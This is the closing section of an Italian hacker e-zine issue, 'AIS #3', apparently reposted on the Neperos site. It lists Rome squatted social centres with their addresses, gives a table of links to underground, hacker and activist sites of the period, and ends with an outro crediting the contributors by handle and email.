Via Caduti della Liberazione 268 ( Spinaceto )
Tel. o6-5o88565
Blitz -------> Via Meuccio Ruini 45
Brancaleone -> branka@pronet.it
via Levanna 11
Tel. o6-82ooo959 oppure o6-82ooo851
Break Out ---> Via Dibbiena 3 ( Primavalle )
"La Talpa" --> http://www.tmcrew.org/csa/cbernocc/cbstory.htm>
Via Guido Brogi 21 ( Casal Bernocchi )
Casale Podere Rosa --> Via Fabbri Tel. o6-8271545
Corto Circuito -----> cortocircuito@mail.pelagus.it>
Via Serafini 57 (Lamaro) Tel. o6-7217628
EL CHEntrosociale Torbellamonaca --> Largo Mengaroni 11
( Tor Bella Monaca )
Er Garage --> Via Tranfo (San Basilio)
Ex Casa del Popolo --> Via di Valle Aurelia 37 ( Valle Aurelia )
Ex Snia Viscosa ---> http://www.tmcrew.org/arte/manifest.htm
Via Prenestina 173
Il Garage -----------> Via Gustavo Modena 92 ( Trastevere )
Hai Visto Quinto? ---> Via Val Pellice 4 (Montesacro) Tel. o6-862o5262
Interzona -----------> Via Valle Aurelia 37
Intifada ------------> Via di Casalbruciato 15 Tel. o6-4358785o
Ip• -V-e-n-i-t-e-c-i-> Via del Giardino Vecchio Marino (KastelliRomani)
Laurentinokkupato ---> www.tmcrew.org/laurentinokkupato/index.htm
Via Giuliotti 8 ( 6ø ponte )
Macchia Rossa -------> Via Pieve Fosciana 82 ( Majana )
La Maggiolina ------> Via Bencivenga Tel. o6-862o7352
Obelix --------------> Via val Melaina 4
Pirateria -----------> Circonvallazione Ostiense 9 ( Mercati Generali )
Ricomincio dal Faro -> Via Trullo 330 ( Trullo )
Spaziokamino --------> http://www.tmcrew.org/csa/spzk/index.htm>
Via Calenzana 7 ( Ostia )
La Strada ----------> http://www.ecn.org/la.strada/
Via Passino 24 ( Garbatella ) Tel. o6-5133659
La Torre ------------> mmariuz@tin.it via Bertero ( Casal Dei Pazzi )
Tel. o6-8822869
La Strada -----------> http://www.ecn.org/la.strada/
Via Passino 24 ( Garbatella ) Tel. o6-5133659
Via dei Volsci ------> http://www.tmcrew.org/csa/viadeivolsci/index.htm
Quartiere san Lorenzo
Vittorio Occupato ---> http://www.tmcrew.org/csa/vittorio/vittor.htm Lungomare
Toscanelli 184---> ( Ostia Lido )
Zona A Rischio ------> http://www.tmcrew.org/zonarischio/index.htm
Via De Dominicis 4 ( Casalbertone )
Tel.o6-4393271
Forte Prenestino ---> http://www.ecn.org/forte/ forte@ecn.org
Via Federico Delpino ( 1oo celle )
Tel/Fax. o6-218o7855

------------------------------------------------------------------[ lInKs ]---
===] LINKS ]==================================================================
-----[ LVOA Area61 Produzioni Clandestine ]-----------------------------------


+---------------------------------------------------------------------+
| Link a siti alternativi |
+--------+------------------------------------------------------------+
| Antisocial | http://antisocial.tsx.org/ |
| Ringzero | http://ringzer0.cjb.net/ |
| Attila Hack | http://attilahack.cjb.net/ |
| Wannabe E-Zine | http://wannabe00.cjb.net/ |
| Bypass | http://bypass.pcupdate.easyspace.com/ |
| Cavallo de Cavallis | http://fly.to/cavallo/ |
| Cyb0rG | http://alternativex.cjb.net/ |
| Drac | http://come.to/dracitalia/ |
| Techno Knight | http://members.xoom.it/TechnoKnight/ |
| Kalidor | http://kalidor.tsx.org/ |
| Lopks | http://come.to/lopks |
| Lord Guf | http://guf.cjb.net/ |
| Lupin | http://www.lupin3rd.org/ |
| MrZero | http://www2.sienanet.it/users/MrZeRo/ |
| Softproject | http://www.s0ftpj.org/ |
| Ozone | http://zap.to/ozone/ |
| MasterG | http://web.tiscalinet.it/masterpage/ |
| Sector | |
| http://www.angelfire.com/on/sectoronex/index.html |
| Spaghetti Phreakers | http://www.spaghettiphreakers.softitaly.com |
| Anlongex | http://www.mesa-sys.com/~along3x/welcome.htm |
| Under Construction | http://underconstruction.webjump.com/ |
| Valvoline Crew | http://valvoline.cjb.net/ |
| Spippolatori | http://www.spippolatori.com |
| BobbyMetal | http://members.theglobe.com/Bobbymetal/ |
| Bonu$ | http://wurstel.ing.unibs.it/~bonus/ |
| Assassinz | |
| http://www.fortunecity.com/skyscraper/database/483/ |
| Pgreko | http://pgreko.tsx.org/ |
| Dislessici | http://www.dislessici.org |
| Spiritoz | http://spiritoz.cjb.net/ |
| YanOrel | http://come.to/YanOrel |
| Terminal.c | http://www.ecn.org/loa/terminal/ |
| UIC & Quequero | http://www.uic-spippolatori.com |
+----------------------+----------------------------------------------+
| ECN | http://www.ecn.org |
| TMCrew | http://www.tmcrew.org |
| Sherwood | http://www.sherwood.it/ |
| Kyuzz | http://www.kyuzz.org |
| Strano Network | http://strano.net |
| Voyanet | http://www.voyanet.org |
| Peacelink | http://www.peacelink.it |
| Metro Olografix | http://www.olografix.com |
+----------------------+----------------------------------------------+
| Punto Informatico | http://www.punto-informatico.it/ |
| Apogeo On Line | http://www.apogeonline.com |
+----------------------+----------------------------------------------+
| Hacklab Firenze | http://firenze.hacklab.org/ |
| AVANA | |
| http://www.ecn.org/forte/laboratori/avanahome.html |
| Politecnico Torino | http://www.poli.studenti.to.it/ |
+----------------------+----------------------------------------------+
| Radio Cybernet | http://www.kyuzz.org/radiocybernet/ |
| Golem | http://www.grr.rai.it/golem |
+----------------------+----------------------------------------------+
| Neural | http://www.pandora.it/neural |
| Decoder | http://www.decoder.it - |
| | http://www4.iol.it/decoder |
| Infoxoa | http://www.tmcrew.org/lab00128/index |
+----------------------+----------------------------------------------+
| Linux | http://www.linux.it |
| Manuali | http://www.manuali.net |
+----------------------+----------------------------------------------+
| Gnu | http://www.gnu.org |
+----------------------+----------------------------------------------+
| Etoy | http://www.etoy.com |
| Netomat | http://www.netomat.net |
+----------------------+----------------------------------------------+
| CAQ | http://www.caq.com |
| Wired | http://www.wired.com |
+----------------------+----------------------------------------------+
http://www.twilight-cd.com
http://www.kevinmitnick.com
http://www.rtmark.com
http://www.2600.com
-
------------------------------------------------------------------[ oUtr0 ]---
===] OUTRO AIS#3 ]============================================================
-----[ LVOA AreA61 pR0duZiOnI cLanDeStiNe ]-----------------------------------

Non mi resta altro che salutarvi, questo numero 3 e' finito....ora AiS si
riposa, il numero4 non uscira' prima di meta'/fine settembre, ma cmq ci
sara' a breve lo speciale "on the beach"...
-[ Anarchy In the Summer ]-

Ciao a tutti e...

...cHe lA fOrzA sIa kOn tE!!!...

by OldirOn61 wEbMaSter of:
____ ____ ____ ____ ____ _
_ |___ \| __ \/ __ \|___ \/ __|| | _
(_)/ __ || /| ___// __ || __ \| |(_)
\____/|_|\_\\____|\____/\____/|_|
-| LaBoRatOriO VirtuAle OkkUpAto & AuToGesTiTo Area61:ZonA FranKa|-

-| http://www.area61.cjb.net |- (http://area61.bbk.org coming soon)
-| area61@iname.com |-
-| azzurraNET(Chat.jodler.net) #area61 |-
-| news.shy.datawell.it alt.lvoa.area61 |-
-| http://Area61.egroups.com |-


x L' e-ZiNe _
____ (_) ____
_ |___ \| |/ ___| _
(_)/ __ || |\___ \(_)
\____/|_||____/
-|AnArCHy iN tHe SySTeM|-
^^-|uNiVeRsAl E_ZiNe|-^^

-| http://aisprod.cjb.net |-
-| http://aisprod.tsx.org |- [rEdiReCt #1]
-| aisprod@freemail.it |-
-| ircNET(irc.flashnet.it) #aisprod |-
-| http://aisprodML.listbot.com |-


WeBmAsTEr: OldirOn61
ASCII by: cYb0rG-OldirOn61

HaNNo SkrIttO pEr qUesTO nUmErO: (In ordine rigorosamente sparso)

-mR_bIs0n -(aduggento@net-service.net)
-The Raven -(the_raven@libero.it)
-Kalidor -(kalidor@tin.it)
-sP3nky -(sp3nky@freemail.it)
-OldirOn61 -(oldiron61@iname.com)
-]CyBOrG[ -(cyborg@freemail.it)
-Golem -(g0lem@SoftHome.com)
-QueQuero -(UIC@mail.usa.com)
-X_Ted NOT AVAILABLE
-Away -(away@subdimension.com)
-Falcon -(falcon@thenavy.com)
-Maggiorana -(maggiorana@tiscalinet.it)
-WhITeFiRE -(fausu@libero.it)
-Orka4n -(orka4n@yahoo.it)
-The Jackal -(-jackal-@libero.it)
-Dmaster -(dmaster@infinito.it)
-/zOKA/ -(inkazzato_@hotmail.com)
-Davser -(davser@tin.it)
-adr3 -(acidjm@yahoo.it)
-Vulcan -(vulcan12mm@hotmail.com)
-ZETA NOT AVAILABLE
-Sash4 -(sash4@inwind.it)
-R A M S E S -(ram5e5@freemail.it)
-H4mBuck3r -(Hambucker@myself.com)
-ValK -(valkzone@infinito.it)


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT